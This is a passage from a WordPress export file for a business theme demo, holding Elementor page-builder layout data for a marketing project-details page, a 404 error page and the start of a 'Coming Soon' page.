		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3c1bcc97","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"269995a","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5abe166e","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1f4595df","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"3738a3a7","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"2a6a10f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"17d6ef46","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3ad8441","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4c261373","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"71428679","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1e56f55c","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"4a101bc2","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"344e5a57","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"31ba8a7c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"618b4571","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d286c1c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"772279c4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"683bd9c1","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"97824d7","elType":"section","settings":[],"elements":[{"id":"18cf565","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"82ec9e1","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5878998","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6c6c176","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"97fe094","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"5918b34","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2a5d5fc","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8881a5f","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"2b23f11","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"83b49e4","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4bd1a7c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"78f9c76","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"79cb0c9","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"b357996","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"b69580f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"92225d2","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"3fb1183","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"c4b696d","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a696e6b","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"cc4bd95","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"1eb2d2e","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"56174b0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"2a324cc","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"94a01dd","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1220]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[844]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_w]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>404</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/404-2/</link>
		<pubDate>Wed, 09 Sep 2020 03:33:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=597</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz Business">
				</a>			        
			<h1>404</h1>		
			<h2>Sorry! Page Not Found!</h2>		
		<p>Oops! The page you are looking for does not exist. Please return to the site’s homepage.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz-business/">TAKE ME HOME</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>597</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:33:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:33:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[404-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"dc90a5e","elType":"section","settings":{"height":"full","content_position":"middle","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg-404.jpg","id":599},"css_classes":"error-404","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"ab481db","elType":"column","settings":{"_column_size":100,"_inline_size":null,"align":"center","_ot_content_align":""},"elements":[{"id":"ff9a571","elType":"widget","settings":{"align":"center","logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":1933},"logo_width":{"unit":"px","size":140,"sizes":[]},"_position":"fixed","_offset_x":{"size":0,"unit":"px"},"_offset_y":{"size":70,"unit":"px"},"_offset_y_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"2a1d1ef","elType":"widget","settings":{"title":"404","header_size":"h1","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":180,"sizes":[]},"typography_font_weight":"300","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":80,"sizes":[]},"typography_font_family":"Open Sans","typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"6bd4e37","elType":"widget","settings":{"title":"Sorry! Page Not Found!","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":42,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":34,"sizes":[]},"typography_line_height_mobile":{"unit":"em","size":1.1999999999999999555910790149937383830547332763671875,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"02eb208","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"b70cb7b","elType":"column","settings":{"_column_size":33,"_inline_size":30,"_inline_size_tablet":20},"elements":[],"isInner":true},{"id":"2ca71f3","elType":"column","settings":{"_column_size":33,"_inline_size":38.88900000000000289901436190120875835418701171875,"_inline_size_tablet":60},"elements":[{"id":"c0b5c0b","elType":"widget","settings":{"editor":"<p>Oops! The page you are looking for does not exist. Please return to the site\u2019s homepage.<\/p>","align":"center","text_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"column_gap":{"unit":"%","size":"","sizes":[]},"_element_custom_width":{"unit":"px","size":425,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1958c9e","elType":"column","settings":{"_column_size":33,"_inline_size":30.77499999999999857891452847979962825775146484375,"_inline_size_tablet":20},"elements":[],"isInner":true}],"isInner":true},{"id":"c047923","elType":"widget","settings":{"_css_classes":"page-content","_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-search"},{"id":"64444b7","elType":"widget","settings":{"align":"center","text":"TAKE ME HOME","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","background_color":"","border_color":""},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:5:"align";i:1;s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:4:{s:9:"_position";i:1;s:9:"_offset_x";i:1;s:9:"_offset_y";i:1;s:16:"_offset_y_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:3:{s:5:"title";i:2;s:11:"header_size";i:1;s:5:"align";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:8:{s:11:"title_color";i:2;s:21:"typography_typography";i:2;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_family";i:1;s:22:"typography_line_height";i:1;s:29:"typography_line_height_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:1;s:10:"column_gap";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:5:"align";i:1;s:10:"text_color";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:1:{s:21:"_element_custom_width";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:6:"layout";i:1;s:3:"gap";i:1;s:6:"height";i:1;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:11:"css_classes";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_image";i:1;}}}}s:16:"wp-widget-search";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:1;s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/coming-soon/</link>
		<pubDate>Wed, 09 Sep 2020 03:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=604</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
